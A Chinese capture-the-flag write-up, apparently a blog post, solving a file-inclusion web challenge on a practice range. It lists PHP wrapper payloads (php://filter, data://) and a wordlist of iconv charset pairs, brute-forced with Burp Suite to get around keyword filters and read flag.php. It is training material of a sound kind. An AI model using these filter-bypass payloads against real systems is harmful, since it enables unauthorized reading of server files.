109,【1】攻防世界 web 题目名称-文件包含

进入靶场

直接显示源代码

提示我们通过get方式传递名为filename的参数,同时给出了文件名check.php

filename=check.php

显示使用了正确的用法,错误的方法

filename=./check.php

还是一样的回显

傻了,题目名称是文件包含,需要用到函数

文件包含漏洞-CSDN博客

先试试最常用到的这个

php://filter/read=convert.base64-encode/resource=flag.php

被过滤了

换一个伪协议

data://text/plain,123456

话是这么说,但没显示123456说明data协议不行

间接提示了php伪协议换个过滤器说不定可以

php://filter/read=convert.base64-encode/resource=flag.php

之前用的是上面这个,一个个尝试看看被过滤的是哪些

read和base编码被禁了

不使用read的话还有string开头的过滤器

string也被过滤了

试试下面这个

php://filter/convert.iconv.utf-8/gbk/resource=flag.php
作用是将文本从 UTF - 8 编码转换为 GBK 编码

这个编码转换不行,但有很多编码供我们尝试

使用bp去爆破

字典如下

UCS-4*

UCS-4BE

UCS-4LE*

UCS-2

UCS-2BE

UCS-2LE

UTF-32*

UTF-32BE*

UTF-32LE*

UTF-16*

UTF-16BE*

UTF-16LE*

UTF-7

UTF7-IMAP

UTF-8*

ASCII*

发现有两种组合都能得到flag

相关推荐
cipher10 小时前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行3 天前
网络安全总结
安全·web安全
red1giant_star3 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透4 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全
一名优秀的码农4 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Libraeking4 天前
05 安全边界:MCP Server 的权限沙箱与敏感数据保护
安全
龙仔7254 天前
在麒麟V10服务器安全加固,sshd防暴力破解加固,实现“密码错误3次封IP”的需求
服务器·tcp/ip·安全
上海云盾-小余4 天前
即时通讯App的DDoS防御架构设计
运维·服务器·安全
上海云盾商务经理杨杨4 天前
2025年重大网络安全事件回顾与趋势分析
网络·安全·web安全
T_Fire_of_Square4 天前
工控安全-2024振兴杯-被攻击的电机wp
安全